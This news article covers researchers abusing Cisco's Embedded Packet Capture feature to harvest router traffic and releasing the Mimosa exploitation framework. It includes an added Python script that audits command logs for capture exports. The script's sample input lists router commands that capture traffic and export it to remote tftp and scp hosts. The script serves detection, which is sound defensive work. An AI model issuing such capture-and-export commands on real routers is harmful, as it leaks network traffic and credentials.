Wednesday 15 April 2015

Troubleshooting Feature On Cisco Routers is Open to Data-Slurp Abuse


A feature enabled by default on Cisco routers can easily be abused to collect data, security researchers warn.

Embedded Packet Capture (EPC) is designed by Cisco as a troubleshooting and analysis tool. The feature allows network administrators to capture data packets flowing through a Cisco router.
Brazilian security researchers Joaquim Espinhara and Rafael Silva were able to abuse the function and build a system that hoovers up huge volumes of data.

Silva told El Reg that the hack was made possible by abusing the EPC function rather than by exploiting a vulnerability as such. Both Cisco and the researchers agree that abusing the function requires privileged user access (such as an admin account), a hurdle that would-be attackers would need to clear through some other attack or a social-engineering ploy.
However, because the troubleshooting functionality is enabled by default, it presents a risk, according to Silva.

"There is no way to disable this function, since this function is commonly used for troubleshooting network problems," said Silva. "Cisco has to implement some features that could stop or [make] difficult this approach to abusing EPC."

Pulling off the attack requires "medium knowledge" and about $10k in cash "to build your mini-NSA to collect and use the Mimosa framework", according to Silva. The main limitation is that would-be attackers must have full (enable mode) access to the router or routers.

A proof-of-concept hack developed by the researchers uses multiple Cisco routers configured with default accounts to send traffic data (input, output, or both) to a repository. Raw packet data acquired this way can be interrogated to extract the kind of information hackers are generally interested in, such as user credentials, pre-shared keys and other sensitive information. The researchers plan to extend their work to develop further attacks.

EPC is seen by Cisco as "a well-documented series of commands that require privileged user access ... For this reason, our best advice to customers is to ensure appropriate user access controls are in place," a spokesman added.

The research, which will be presented and demonstrated for the first time at the Infiltrate security conference in Miami on Thursday (April 16), is most relevant to penetration testers. The researchers have accompanied the presentation with the release of the Mimosa Framework 1.0 source code, a network-kit exploitation framework that can be used to run attacks based either on exploiting known vulnerabilities or on brute-forcing weak passwords (think Metasploit for network kit).
Silva said: "With Mimosa, you can check a huge list of routers, start capturing, stop capturing, export captures and do some basic attacks such as brute force and exploiting old CVEs ..."
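Because EPC cannot be disabled and Cisco's advice is to rely on access controls, the practical defensive check is to watch what privileged users actually type. The script below is an added example written for this post, not code from the original article or from the Mimosa framework. It replays EPC commands in the order they were issued, reconstructs which capture points exist, whether they were started and where their buffers were exported, and flags any export that leaves the box. The command syntax (classic IOS "monitor capture point ... / monitor capture buffer ... export" and IOS XE "monitor capture NAME ...") is this editor's reading of Cisco's documentation and is an assumption to verify against your own platform; the sample command lines, names, interfaces and hosts are constructed and hypothetical.

```python
"""Audit Cisco IOS command records for Embedded Packet Capture (EPC) use.

Added example for this post, not code from the original article or from the
Mimosa framework. It parses the classic IOS EPC syntax ("monitor capture
point ...", "monitor capture buffer ...") and the IOS XE syntax
("monitor capture NAME ...") and flags captures exported off-box, which is
the pattern the researchers describe. The syntax is an assumption taken
from Cisco documentation; check it against your own platform's output.
"""
import re
from dataclasses import dataclass, field

# Constructed sample input: command lines as they might appear in
# "archive log config" output or AAA command accounting once the
# timestamp/user fields are stripped. Names, interfaces and hosts are
# hypothetical.
SAMPLE_COMMANDS = [
    "monitor capture buffer BUF1 size 2048 max-size 1518 circular",
    "monitor capture point ip cef CP1 GigabitEthernet0/0 both",
    "monitor capture point associate CP1 BUF1",
    "monitor capture point start CP1",
    "monitor capture buffer BUF1 export tftp://192.0.2.10/cp1.pcap",
    "monitor capture CAP2 interface  GigabitEthernet0/1 in",   # IOS XE style
    "monitor capture CAP2 start",
    "monitor capture CAP2 export scp://198.51.100.7/caps/cap2.pcap",
    "monitor capture CAP3 interface GigabitEthernet0/2 out",
    "monitor capture CAP3 export flash:cap3.pcap",             # stays on-box
    "show ip interface brief",
]

# Export targets on these schemes leave the router; flash:, bootflash:,
# disk0: and similar local file systems do not.
REMOTE_SCHEMES = {"tftp", "ftp", "sftp", "scp", "http", "https"}

@dataclass
class Capture:
    name: str
    interface: str = ""
    direction: str = ""          # in / out / both
    started: bool = False
    exports: list = field(default_factory=list)

# Classic IOS EPC: a capture point is tied to a buffer with "associate",
# and the export is issued on the buffer.
CLASSIC_POINT = re.compile(r"^monitor capture point ip cef (\S+) (\S+) (in|out|both)$")
CLASSIC_ASSOC = re.compile(r"^monitor capture point associate (\S+) (\S+)$")
CLASSIC_START = re.compile(r"^monitor capture point start (\S+)$")
CLASSIC_EXPORT = re.compile(r"^monitor capture buffer (\S+) export (\S+)$")
# IOS XE EPC: one named capture carries interface, start and export.
XE_POINT = re.compile(r"^monitor capture (\S+) interface (\S+) (in|out|both)$")
XE_START = re.compile(r"^monitor capture (\S+) start$")
XE_EXPORT = re.compile(r"^monitor capture (\S+) export (\S+)$")

def is_remote(uri: str) -> bool:
    """True when the export target is a network URI rather than local storage."""
    m = re.match(r"^([A-Za-z][A-Za-z0-9+.-]*):", uri)
    return bool(m) and m.group(1).lower() in REMOTE_SCHEMES

def audit(commands):
    """Replay EPC commands in order and return {capture name: Capture}."""
    captures = {}
    buffer_to_point = {}

    def get(name):
        return captures.setdefault(name, Capture(name))

    for raw in commands:
        cmd = " ".join(raw.split())          # collapse stray whitespace
        if m := CLASSIC_POINT.match(cmd):
            cap = get(m[1])
            cap.interface, cap.direction = m[2], m[3]
        elif m := CLASSIC_ASSOC.match(cmd):
            buffer_to_point[m[2]] = m[1]
        elif m := CLASSIC_START.match(cmd):
            get(m[1]).started = True
        elif m := CLASSIC_EXPORT.match(cmd):
            # Attribute the export to the point using this buffer, or
            # record it under the buffer name if no association was seen.
            get(buffer_to_point.get(m[1], m[1])).exports.append(m[2])
        elif m := XE_POINT.match(cmd):
            cap = get(m[1])
            cap.interface, cap.direction = m[2], m[3]
        elif m := XE_START.match(cmd):
            get(m[1]).started = True
        elif m := XE_EXPORT.match(cmd):
            get(m[1]).exports.append(m[2])
    return captures

def remote_exports(captures):
    """(capture name, URI) for every export that sends packets off the box."""
    return [(c.name, uri) for c in captures.values()
            for uri in c.exports if is_remote(uri)]

def report(captures):
    """One line per capture; off-box exports are marked for follow-up."""
    lines = []
    for c in captures.values():
        state = "started" if c.started else "defined"
        lines.append(f"{c.name}: {c.interface or '?'} {c.direction or '?'} ({state})")
        for uri in c.exports:
            flag = "REMOTE EXPORT" if is_remote(uri) else "local export"
            lines.append(f"  {flag}: {uri}")
    return lines

if __name__ == "__main__":
    print("\n".join(report(audit(SAMPLE_COMMANDS))))
```

Run against the constructed sample, CP1 and CAP2 are reported as remote exports and CAP3 as a local one. Feeding it real AAA command-accounting records gives you the audit trail Cisco's advice implies: every capture defined, started or exported, tied back to the account that issued it.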

Configuring routers to collect data and build a huge database is the kind of capability likely to be of interest to signals intelligence agencies, as the ongoing Edward Snowden leaks (at the very least) would suggest.

Cisco introduced the function about six years ago. Silva does not know whether or not anyone has abused the function to collect data and analyse it later. "I think that the NSA has better techniques to do it," he joked.

"Other vendors may have the same function to capture and export packets to a remote location," according to Silva, but any such shortcomings are outside the scope of Espinhara and Silva's research.
Infiltrate is a two-day conference focused exclusively on offensive security. It features carefully chosen technical talks on the latest exploits and techniques. ®
